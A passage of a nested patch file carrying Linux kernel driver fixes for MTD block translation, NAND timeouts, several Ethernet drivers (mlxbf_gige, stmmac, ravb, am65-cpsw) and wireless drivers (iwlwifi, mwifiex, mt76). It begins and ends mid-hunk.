+@@ -463,7 +463,7 @@ static void blktrans_notify_add(struct mtd_info *mtd)
+ {
+ 	struct mtd_blktrans_ops *tr;
+ 
+-	if (mtd->type == MTD_ABSENT)
++	if (mtd->type == MTD_ABSENT || mtd->type == MTD_UBIVOLUME)
+ 		return;
+ 
+ 	list_for_each_entry(tr, &blktrans_majors, list)
+@@ -503,7 +503,7 @@ int register_mtd_blktrans(struct mtd_blktrans_ops *tr)
+ 	mutex_lock(&mtd_table_mutex);
+ 	list_add(&tr->list, &blktrans_majors);
+ 	mtd_for_each_device(mtd)
+-		if (mtd->type != MTD_ABSENT)
++		if (mtd->type != MTD_ABSENT && mtd->type != MTD_UBIVOLUME)
+ 			tr->add_mtd(tr, mtd);
+ 	mutex_unlock(&mtd_table_mutex);
+ 	return 0;
+diff --git a/drivers/mtd/nand/raw/fsl_ifc_nand.c b/drivers/mtd/nand/raw/fsl_ifc_nand.c
+index 02d5001768382..bea1a7d3edd78 100644
+--- a/drivers/mtd/nand/raw/fsl_ifc_nand.c
++++ b/drivers/mtd/nand/raw/fsl_ifc_nand.c
+@@ -20,7 +20,7 @@
+ 
+ #define ERR_BYTE		0xFF /* Value returned for read
+ 					bytes when read failed	*/
+-#define IFC_TIMEOUT_MSECS	500  /* Maximum number of mSecs to wait
++#define IFC_TIMEOUT_MSECS	1000 /* Maximum timeout to wait
+ 					for IFC NAND Machine	*/
+ 
+ struct fsl_ifc_ctrl;
+diff --git a/drivers/net/amt.c b/drivers/net/amt.c
+index 2d20be6ffb7e5..ddd087c2c3ed4 100644
+--- a/drivers/net/amt.c
++++ b/drivers/net/amt.c
+@@ -11,7 +11,7 @@
+ #include <linux/net.h>
+ #include <linux/igmp.h>
+ #include <linux/workqueue.h>
+-#include <net/sch_generic.h>
++#include <net/pkt_sched.h>
+ #include <net/net_namespace.h>
+ #include <net/ip.h>
+ #include <net/udp.h>
+@@ -80,11 +80,11 @@ static struct mld2_grec mldv2_zero_grec;
+ 
+ static struct amt_skb_cb *amt_skb_cb(struct sk_buff *skb)
+ {
+-	BUILD_BUG_ON(sizeof(struct amt_skb_cb) + sizeof(struct qdisc_skb_cb) >
++	BUILD_BUG_ON(sizeof(struct amt_skb_cb) + sizeof(struct tc_skb_cb) >
+ 		     sizeof_field(struct sk_buff, cb));
+ 
+ 	return (struct amt_skb_cb *)((void *)skb->cb +
+-		sizeof(struct qdisc_skb_cb));
++		sizeof(struct tc_skb_cb));
+ }
+ 
+ static void __amt_source_gc_work(void)
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index ef1a4a7c47b23..3efd556690563 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -1119,6 +1119,8 @@ static int vsc73xx_gpio_probe(struct vsc73xx *vsc)
+ 
+ 	vsc->gc.label = devm_kasprintf(vsc->dev, GFP_KERNEL, "VSC%04x",
+ 				       vsc->chipid);
++	if (!vsc->gc.label)
++		return -ENOMEM;
+ 	vsc->gc.ngpio = 4;
+ 	vsc->gc.owner = THIS_MODULE;
+ 	vsc->gc.parent = vsc->dev;
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+index 2292d63a279c1..83c4659390fd5 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+@@ -130,9 +130,15 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ {
+ 	struct mlxbf_gige *priv = netdev_priv(netdev);
+ 	struct phy_device *phydev = netdev->phydev;
++	u64 control;
+ 	u64 int_en;
+ 	int err;
+ 
++	/* Perform general init of GigE block */
++	control = readq(priv->base + MLXBF_GIGE_CONTROL);
++	control |= MLXBF_GIGE_CONTROL_PORT_EN;
++	writeq(control, priv->base + MLXBF_GIGE_CONTROL);
++
+ 	err = mlxbf_gige_request_irqs(priv);
+ 	if (err)
+ 		return err;
+@@ -147,14 +153,14 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	 */
+ 	priv->valid_polarity = 0;
+ 
+-	err = mlxbf_gige_rx_init(priv);
++	phy_start(phydev);
++
++	err = mlxbf_gige_tx_init(priv);
+ 	if (err)
+ 		goto free_irqs;
+-	err = mlxbf_gige_tx_init(priv);
++	err = mlxbf_gige_rx_init(priv);
+ 	if (err)
+-		goto rx_deinit;
+-
+-	phy_start(phydev);
++		goto tx_deinit;
+ 
+ 	netif_napi_add(netdev, &priv->napi, mlxbf_gige_poll);
+ 	napi_enable(&priv->napi);
+@@ -176,8 +182,8 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 
+ 	return 0;
+ 
+-rx_deinit:
+-	mlxbf_gige_rx_deinit(priv);
++tx_deinit:
++	mlxbf_gige_tx_deinit(priv);
+ 
+ free_irqs:
+ 	mlxbf_gige_free_irqs(priv);
+@@ -279,7 +285,6 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	void __iomem *plu_base;
+ 	void __iomem *base;
+ 	int addr, phy_irq;
+-	u64 control;
+ 	int err;
+ 
+ 	base = devm_platform_ioremap_resource(pdev, MLXBF_GIGE_RES_MAC);
+@@ -294,11 +299,6 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	if (IS_ERR(plu_base))
+ 		return PTR_ERR(plu_base);
+ 
+-	/* Perform general init of GigE block */
+-	control = readq(base + MLXBF_GIGE_CONTROL);
+-	control |= MLXBF_GIGE_CONTROL_PORT_EN;
+-	writeq(control, base + MLXBF_GIGE_CONTROL);
+-
+ 	netdev = devm_alloc_etherdev(&pdev->dev, sizeof(*priv));
+ 	if (!netdev)
+ 		return -ENOMEM;
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index 227d01cace3f0..6999843584934 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -142,6 +142,9 @@ int mlxbf_gige_rx_init(struct mlxbf_gige *priv)
+ 	writeq(MLXBF_GIGE_RX_MAC_FILTER_COUNT_PASS_EN,
+ 	       priv->base + MLXBF_GIGE_RX_MAC_FILTER_COUNT_PASS);
+ 
++	writeq(ilog2(priv->rx_q_entries),
++	       priv->base + MLXBF_GIGE_RX_WQE_SIZE_LOG2);
++
+ 	/* Clear MLXBF_GIGE_INT_MASK 'receive pkt' bit to
+ 	 * indicate readiness to receive interrupts
+ 	 */
+@@ -154,9 +157,6 @@ int mlxbf_gige_rx_init(struct mlxbf_gige *priv)
+ 	data |= MLXBF_GIGE_RX_DMA_EN;
+ 	writeq(data, priv->base + MLXBF_GIGE_RX_DMA);
+ 
+-	writeq(ilog2(priv->rx_q_entries),
+-	       priv->base + MLXBF_GIGE_RX_WQE_SIZE_LOG2);
+-
+ 	return 0;
+ 
+ free_wqe_and_skb:
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+index 4c98950380d53..d231f4d2888be 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+@@ -301,6 +301,7 @@ mlxsw_sp_acl_erp_table_alloc(struct mlxsw_sp_acl_erp_core *erp_core,
+ 			     unsigned long *p_index)
+ {
+ 	unsigned int num_rows, entry_size;
++	unsigned long index;
+ 
+ 	/* We only allow allocations of entire rows */
+ 	if (num_erps % erp_core->num_erp_banks != 0)
+@@ -309,10 +310,11 @@ mlxsw_sp_acl_erp_table_alloc(struct mlxsw_sp_acl_erp_core *erp_core,
+ 	entry_size = erp_core->erpt_entries_size[region_type];
+ 	num_rows = num_erps / erp_core->num_erp_banks;
+ 
+-	*p_index = gen_pool_alloc(erp_core->erp_tables, num_rows * entry_size);
+-	if (*p_index == 0)
++	index = gen_pool_alloc(erp_core->erp_tables, num_rows * entry_size);
++	if (!index)
+ 		return -ENOBUFS;
+-	*p_index -= MLXSW_SP_ACL_ERP_GENALLOC_OFFSET;
++
++	*p_index = index - MLXSW_SP_ACL_ERP_GENALLOC_OFFSET;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c b/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c
+index 27b1663c476e7..64b209a0ad219 100644
+--- a/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c
++++ b/drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c
+@@ -391,7 +391,7 @@ nla_put_failure:
+ 
+ struct rtnl_link_ops rmnet_link_ops __read_mostly = {
+ 	.kind		= "rmnet",
+-	.maxtype	= __IFLA_RMNET_MAX,
++	.maxtype	= IFLA_RMNET_MAX,
+ 	.priv_size	= sizeof(struct rmnet_priv),
+ 	.setup		= rmnet_vnd_setup,
+ 	.validate	= rmnet_rtnl_validate,
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index c2c56a5289caf..e7b70006261f7 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1965,7 +1965,7 @@ static netdev_tx_t ravb_start_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 	struct ravb_tstamp_skb *ts_skb;
+ 	struct ravb_tx_desc *desc;
+ 	unsigned long flags;
+-	u32 dma_addr;
++	dma_addr_t dma_addr;
+ 	void *buffer;
+ 	u32 entry;
+ 	u32 len;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac.h b/drivers/net/ethernet/stmicro/stmmac/stmmac.h
+index bdbf86cb102af..46944c02b45ed 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac.h
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac.h
+@@ -247,6 +247,7 @@ struct stmmac_priv {
+ 	u32 msg_enable;
+ 	int wolopts;
+ 	int wol_irq;
++	bool wol_irq_disabled;
+ 	int clk_csr;
+ 	struct timer_list eee_ctrl_timer;
+ 	int lpi_irq;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+index 35c8dd92d3692..f03aa8a0b8954 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+@@ -761,10 +761,16 @@ static int stmmac_set_wol(struct net_device *dev, struct ethtool_wolinfo *wol)
+ 	if (wol->wolopts) {
+ 		pr_info("stmmac: wakeup enable\n");
+ 		device_set_wakeup_enable(priv->device, 1);
+-		enable_irq_wake(priv->wol_irq);
++		/* Avoid unbalanced enable_irq_wake calls */
++		if (priv->wol_irq_disabled)
++			enable_irq_wake(priv->wol_irq);
++		priv->wol_irq_disabled = false;
+ 	} else {
+ 		device_set_wakeup_enable(priv->device, 0);
+-		disable_irq_wake(priv->wol_irq);
++		/* Avoid unbalanced disable_irq_wake calls */
++		if (!priv->wol_irq_disabled)
++			disable_irq_wake(priv->wol_irq);
++		priv->wol_irq_disabled = true;
+ 	}
+ 
+ 	mutex_lock(&priv->lock);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index deb6e95a1bca6..8f8de14347a94 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3519,6 +3519,7 @@ static int stmmac_request_irq_multi_msi(struct net_device *dev)
+ 	/* Request the Wake IRQ in case of another line
+ 	 * is used for WoL
+ 	 */
++	priv->wol_irq_disabled = true;
+ 	if (priv->wol_irq > 0 && priv->wol_irq != dev->irq) {
+ 		int_name = priv->int_name_wol;
+ 		sprintf(int_name, "%s:%s", dev->name, "wol");
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 9f2553799895d..76fabeae512db 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -54,7 +54,7 @@
+ #define AM65_CPSW_MAX_PORTS	8
+ 
+ #define AM65_CPSW_MIN_PACKET_SIZE	VLAN_ETH_ZLEN
+-#define AM65_CPSW_MAX_PACKET_SIZE	(VLAN_ETH_FRAME_LEN + ETH_FCS_LEN)
++#define AM65_CPSW_MAX_PACKET_SIZE	2024
+ 
+ #define AM65_CPSW_REG_CTL		0x004
+ #define AM65_CPSW_REG_STAT_PORT_EN	0x014
+@@ -1990,7 +1990,8 @@ am65_cpsw_nuss_init_port_ndev(struct am65_cpsw_common *common, u32 port_idx)
+ 	eth_hw_addr_set(port->ndev, port->slave.mac_addr);
+ 
+ 	port->ndev->min_mtu = AM65_CPSW_MIN_PACKET_SIZE;
+-	port->ndev->max_mtu = AM65_CPSW_MAX_PACKET_SIZE;
++	port->ndev->max_mtu = AM65_CPSW_MAX_PACKET_SIZE -
++			      (VLAN_ETH_HLEN + ETH_FCS_LEN);
+ 	port->ndev->hw_features = NETIF_F_SG |
+ 				  NETIF_F_RXCSUM |
+ 				  NETIF_F_HW_CSUM |
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 54a17b576eac0..7cbcf51bae924 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -3302,6 +3302,7 @@ static struct phy_driver ksphy_driver[] = {
+ 	.flags		= PHY_POLL_CABLE_TEST,
+ 	.driver_data	= &ksz9021_type,
+ 	.probe		= kszphy_probe,
++	.soft_reset	= genphy_soft_reset,
+ 	.config_init	= ksz9131_config_init,
+ 	.config_intr	= kszphy_config_intr,
+ 	.handle_interrupt = kszphy_handle_interrupt,
+diff --git a/drivers/net/wireless/ath/ath11k/ahb.c b/drivers/net/wireless/ath/ath11k/ahb.c
+index 76f275ca53e9c..70d468f013383 100644
+--- a/drivers/net/wireless/ath/ath11k/ahb.c
++++ b/drivers/net/wireless/ath/ath11k/ahb.c
+@@ -813,8 +813,8 @@ static int ath11k_core_get_rproc(struct ath11k_base *ab)
+ 
+ 	prproc = rproc_get_by_phandle(rproc_phandle);
+ 	if (!prproc) {
+-		ath11k_err(ab, "failed to get rproc\n");
+-		return -EINVAL;
++		ath11k_dbg(ab, ATH11K_DBG_AHB, "failed to get rproc, deferring\n");
++		return -EPROBE_DEFER;
+ 	}
+ 	ab_ahb->tgt_rproc = prproc;
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c b/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c
+index a3cefbc43e80d..2c14188f34bbc 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/phy-ctxt.c
+@@ -99,17 +99,6 @@ static void iwl_mvm_phy_ctxt_set_rxchain(struct iwl_mvm *mvm,
+ 		active_cnt = 2;
+ 	}
+ 
+-	/*
+-	 * If the firmware requested it, then we know that it supports
+-	 * getting zero for the values to indicate "use one, but pick
+-	 * which one yourself", which means it can dynamically pick one
+-	 * that e.g. has better RSSI.
+-	 */
+-	if (mvm->fw_static_smps_request && active_cnt == 1 && idle_cnt == 1) {
+-		idle_cnt = 0;
+-		active_cnt = 0;
+-	}
+-
+ 	*rxchain_info = cpu_to_le32(iwl_mvm_get_valid_rx_ant(mvm) <<
+ 					PHY_RX_CHAIN_VALID_POS);
+ 	*rxchain_info |= cpu_to_le32(idle_cnt << PHY_RX_CHAIN_CNT_POS);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index caaf4d52e2c64..76219486b9c2e 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -2200,7 +2200,7 @@ int iwl_mvm_flush_sta_tids(struct iwl_mvm *mvm, u32 sta_id, u16 tids)
+ 	WARN_ON(!iwl_mvm_has_new_tx_api(mvm));
+ 
+ 	if (iwl_fw_lookup_notif_ver(mvm->fw, LONG_GROUP, TXPATH_FLUSH, 0) > 0)
+-		cmd.flags |= CMD_WANT_SKB;
++		cmd.flags |= CMD_WANT_SKB | CMD_SEND_IN_RFKILL;
+ 
+ 	IWL_DEBUG_TX_QUEUES(mvm, "flush for sta id %d tid mask 0x%x\n",
+ 			    sta_id, tids);
+diff --git a/drivers/net/wireless/marvell/libertas/Kconfig b/drivers/net/wireless/marvell/libertas/Kconfig
+index 6d62ab49aa8d4..c7d02adb3eead 100644
+--- a/drivers/net/wireless/marvell/libertas/Kconfig
++++ b/drivers/net/wireless/marvell/libertas/Kconfig
+@@ -2,8 +2,6 @@
+ config LIBERTAS
+ 	tristate "Marvell 8xxx Libertas WLAN driver support"
+ 	depends on CFG80211
+-	select WIRELESS_EXT
+-	select WEXT_SPY
+ 	select LIB80211
+ 	select FW_LOADER
+ 	help
+diff --git a/drivers/net/wireless/marvell/mwifiex/cfg80211.c b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+index bcd564dc3554a..c907da2a4789a 100644
+--- a/drivers/net/wireless/marvell/mwifiex/cfg80211.c
++++ b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+@@ -2046,6 +2046,8 @@ static int mwifiex_cfg80211_start_ap(struct wiphy *wiphy,
+ 
+ 	mwifiex_set_sys_config_invalid_data(bss_cfg);
+ 
++	memcpy(bss_cfg->mac_addr, priv->curr_addr, ETH_ALEN);
++
+ 	if (params->beacon_interval)
+ 		bss_cfg->beacon_period = params->beacon_interval;
+ 	if (params->dtim_period)
+diff --git a/drivers/net/wireless/marvell/mwifiex/fw.h b/drivers/net/wireless/marvell/mwifiex/fw.h
+index b4f945a549f71..863f5f2247a08 100644
+--- a/drivers/net/wireless/marvell/mwifiex/fw.h
++++ b/drivers/net/wireless/marvell/mwifiex/fw.h
+@@ -165,6 +165,7 @@ enum MWIFIEX_802_11_PRIVACY_FILTER {
+ #define TLV_TYPE_STA_MAC_ADDR       (PROPRIETARY_TLV_BASE_ID + 32)
+ #define TLV_TYPE_BSSID              (PROPRIETARY_TLV_BASE_ID + 35)
+ #define TLV_TYPE_CHANNELBANDLIST    (PROPRIETARY_TLV_BASE_ID + 42)
++#define TLV_TYPE_UAP_MAC_ADDRESS    (PROPRIETARY_TLV_BASE_ID + 43)
+ #define TLV_TYPE_UAP_BEACON_PERIOD  (PROPRIETARY_TLV_BASE_ID + 44)
+ #define TLV_TYPE_UAP_DTIM_PERIOD    (PROPRIETARY_TLV_BASE_ID + 45)
+ #define TLV_TYPE_UAP_BCAST_SSID     (PROPRIETARY_TLV_BASE_ID + 48)
+diff --git a/drivers/net/wireless/marvell/mwifiex/ioctl.h b/drivers/net/wireless/marvell/mwifiex/ioctl.h
+index 091e7ca793762..e8825f302de8a 100644
+--- a/drivers/net/wireless/marvell/mwifiex/ioctl.h
++++ b/drivers/net/wireless/marvell/mwifiex/ioctl.h
+@@ -107,6 +107,7 @@ struct mwifiex_uap_bss_param {
+ 	u8 qos_info;
+ 	u8 power_constraint;
+ 	struct mwifiex_types_wmm_info wmm_info;
++	u8 mac_addr[ETH_ALEN];
+ };
+ 
+ enum {
+diff --git a/drivers/net/wireless/marvell/mwifiex/uap_cmd.c b/drivers/net/wireless/marvell/mwifiex/uap_cmd.c
+index e78a201cd1507..491e366119096 100644
+--- a/drivers/net/wireless/marvell/mwifiex/uap_cmd.c
++++ b/drivers/net/wireless/marvell/mwifiex/uap_cmd.c
+@@ -468,6 +468,7 @@ void mwifiex_config_uap_11d(struct mwifiex_private *priv,
+ static int
+ mwifiex_uap_bss_param_prepare(u8 *tlv, void *cmd_buf, u16 *param_size)
+ {
++	struct host_cmd_tlv_mac_addr *mac_tlv;
+ 	struct host_cmd_tlv_dtim_period *dtim_period;
+ 	struct host_cmd_tlv_beacon_period *beacon_period;
+ 	struct host_cmd_tlv_ssid *ssid;
+@@ -487,6 +488,13 @@ mwifiex_uap_bss_param_prepare(u8 *tlv, void *cmd_buf, u16 *param_size)
+ 	int i;
+ 	u16 cmd_size = *param_size;
+ 
++	mac_tlv = (struct host_cmd_tlv_mac_addr *)tlv;
++	mac_tlv->header.type = cpu_to_le16(TLV_TYPE_UAP_MAC_ADDRESS);
++	mac_tlv->header.len = cpu_to_le16(ETH_ALEN);
++	memcpy(mac_tlv->mac_addr, bss_cfg->mac_addr, ETH_ALEN);
++	cmd_size += sizeof(struct host_cmd_tlv_mac_addr);
++	tlv += sizeof(struct host_cmd_tlv_mac_addr);
++
+ 	if (bss_cfg->ssid.ssid_len) {
+ 		ssid = (struct host_cmd_tlv_ssid *)tlv;
+ 		ssid->header.type = cpu_to_le16(TLV_TYPE_UAP_SSID);
+diff --git a/drivers/net/wireless/mediatek/mt76/eeprom.c b/drivers/net/wireless/mediatek/mt76/eeprom.c
+index 9bc8758573fcc..0a88048b89768 100644
+--- a/drivers/net/wireless/mediatek/mt76/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/eeprom.c
+@@ -62,7 +62,7 @@ int mt76_get_of_eeprom(struct mt76_dev *dev, void *eep, int offset, int len)
+ 		goto out_put_node;
+ 	}
+ 
+-	offset = be32_to_cpup(list);
++	offset += be32_to_cpup(list);
+ 	ret = mtd_read(mtd, offset, len, &retlen, eep);
+ 	put_mtd_device(mtd);
+ 	if (mtd_is_bitflip(ret))
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 9c753c6aabeff..60c9f9c56a4f5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -564,8 +564,7 @@ struct mt76_sdio {
+ 	struct mt76_worker txrx_worker;
+ 	struct mt76_worker status_worker;
+ 	struct mt76_worker net_worker;
+-
+-	struct work_struct stat_work;
++	struct mt76_worker stat_worker;
+ 
+ 	u8 *xmit_buf;
+ 	u32 xmit_buf_sz;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c b/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c
+index 304212f5f8da7..d742b22428f0c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/sdio.c
+@@ -205,8 +205,8 @@ static int mt7663s_suspend(struct device *dev)
+ 	mt76_worker_disable(&mdev->mt76.sdio.txrx_worker);
+ 	mt76_worker_disable(&mdev->mt76.sdio.status_worker);
+ 	mt76_worker_disable(&mdev->mt76.sdio.net_worker);
++	mt76_worker_disable(&mdev->mt76.sdio.stat_worker);
+ 
+-	cancel_work_sync(&mdev->mt76.sdio.stat_work);
+ 	clear_bit(MT76_READING_STATS, &mdev->mphy.state);
+ 
+ 	mt76_tx_status_check(&mdev->mt76, true);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index 10dda1693d7db..19640ff76bdcf 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -1036,21 +1036,26 @@ int __mt7921_mcu_set_clc(struct mt7921_dev *dev, u8 *alpha2,
+ 		u8 type[2];
+ 		u8 rsvd[64];
+ 	} __packed req = {
++		.ver = 1,
+ 		.idx = idx,
+ 		.env = env_cap,
+ 	};
+ 	int ret, valid_cnt = 0;
+-	u8 i, *pos;
++	u16 buf_len = 0;
++	u8 *pos;
+ 
+ 	if (!clc)
+ 		return 0;
+ 
++	buf_len = le16_to_cpu(clc->len) - sizeof(*clc);
+ 	pos = clc->data;
+-	for (i = 0; i < clc->nr_country; i++) {
++	while (buf_len > 16) {
+ 		struct mt7921_clc_rule *rule = (struct mt7921_clc_rule *)pos;
+ 		u16 len = le16_to_cpu(rule->len);
++		u16 offset = len + sizeof(*rule);
+ 
+-		pos += len + sizeof(*rule);
++		pos += offset;
++		buf_len -= offset;
+ 		if (rule->alpha2[0] != alpha2[0] ||
+ 		    rule->alpha2[1] != alpha2[1])
+ 			continue;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c b/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c
+index 3b25a06fd9466..8898ba69b8e97 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/sdio.c
+@@ -222,7 +222,7 @@ static int mt7921s_suspend(struct device *__dev)
+ 	mt76_txq_schedule_all(&dev->mphy);
+ 	mt76_worker_disable(&mdev->tx_worker);
+ 	mt76_worker_disable(&mdev->sdio.status_worker);
+-	cancel_work_sync(&mdev->sdio.stat_work);
++	mt76_worker_disable(&mdev->sdio.stat_worker);
+ 	clear_bit(MT76_READING_STATS, &dev->mphy.state);
+ 	mt76_tx_status_check(mdev, true);
+ 
+@@ -254,6 +254,7 @@ restore_txrx_worker:
+ restore_worker:
+ 	mt76_worker_enable(&mdev->tx_worker);
+ 	mt76_worker_enable(&mdev->sdio.status_worker);
++	mt76_worker_enable(&mdev->sdio.stat_worker);
+ 
+ 	if (!pm->ds_enable)
+ 		mt76_connac_mcu_set_deep_sleep(mdev, false);
+@@ -286,6 +287,7 @@ static int mt7921s_resume(struct device *__dev)
+ 	mt76_worker_enable(&mdev->sdio.txrx_worker);
+ 	mt76_worker_enable(&mdev->sdio.status_worker);
+ 	mt76_worker_enable(&mdev->sdio.net_worker);
++	mt76_worker_enable(&mdev->sdio.stat_worker);
+ 
+ 	/* restore previous ds setting */
+ 	if (!pm->ds_enable)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+index 1b3adb3d91e86..fd07b66233920 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+@@ -107,7 +107,7 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 	mt76_worker_disable(&dev->mt76.sdio.txrx_worker);
+ 	mt76_worker_disable(&dev->mt76.sdio.status_worker);
+ 	mt76_worker_disable(&dev->mt76.sdio.net_worker);
+-	cancel_work_sync(&dev->mt76.sdio.stat_work);
++	mt76_worker_disable(&dev->mt76.sdio.stat_worker);
+ 
+ 	mt7921s_disable_irq(&dev->mt76);
+ 	mt7921s_wfsys_reset(dev);
+@@ -115,6 +115,7 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 	mt76_worker_enable(&dev->mt76.sdio.txrx_worker);
+ 	mt76_worker_enable(&dev->mt76.sdio.status_worker);
+ 	mt76_worker_enable(&dev->mt76.sdio.net_worker);
++	mt76_worker_enable(&dev->mt76.sdio.stat_worker);
+ 
+ 	dev->fw_assert = false;
+ 	clear_bit(MT76_MCU_RESET, &dev->mphy.state);
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index 176207f3177c4..fc4fb94635645 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -481,21 +481,21 @@ static void mt76s_status_worker(struct mt76_worker *w)
+ 		if (dev->drv->tx_status_data && ndata_frames > 0 &&
+ 		    !test_and_set_bit(MT76_READING_STATS, &dev->phy.state) &&
+ 		    !test_bit(MT76_STATE_SUSPEND, &dev->phy.state))
+-			ieee80211_queue_work(dev->hw, &dev->sdio.stat_work);
++			mt76_worker_schedule(&sdio->stat_worker);
+ 	} while (nframes > 0);
+ 
+ 	if (resched)
+ 		mt76_worker_schedule(&dev->tx_worker);
+ }
+ 
+-static void mt76s_tx_status_data(struct work_struct *work)
++static void mt76s_tx_status_data(struct mt76_worker *worker)
+ {
+ 	struct mt76_sdio *sdio;
+ 	struct mt76_dev *dev;
+ 	u8 update = 1;
+ 	u16 count = 0;
+ 
+-	sdio = container_of(work, struct mt76_sdio, stat_work);
++	sdio = container_of(worker, struct mt76_sdio, stat_worker);
+ 	dev = container_of(sdio, struct mt76_dev, sdio);
+ 
+ 	while (true) {
+@@ -508,7 +508,7 @@ static void mt76s_tx_status_data(struct work_struct *work)
+ 	}
+ 
+ 	if (count && test_bit(MT76_STATE_RUNNING, &dev->phy.state))
+-		ieee80211_queue_work(dev->hw, &sdio->stat_work);
++		mt76_worker_schedule(&sdio->status_worker);
+ 	else
+ 		clear_bit(MT76_READING_STATS, &dev->phy.state);
+ }
+@@ -600,8 +600,8 @@ void mt76s_deinit(struct mt76_dev *dev)
+ 	mt76_worker_teardown(&sdio->txrx_worker);
+ 	mt76_worker_teardown(&sdio->status_worker);
+ 	mt76_worker_teardown(&sdio->net_worker);
++	mt76_worker_teardown(&sdio->stat_worker);
+ 
+-	cancel_work_sync(&sdio->stat_work);
+ 	clear_bit(MT76_READING_STATS, &dev->phy.state);
+ 
+ 	mt76_tx_status_check(dev, true);
+@@ -644,10 +644,14 @@ int mt76s_init(struct mt76_dev *dev, struct sdio_func *func,
+ 	if (err)
+ 		return err;
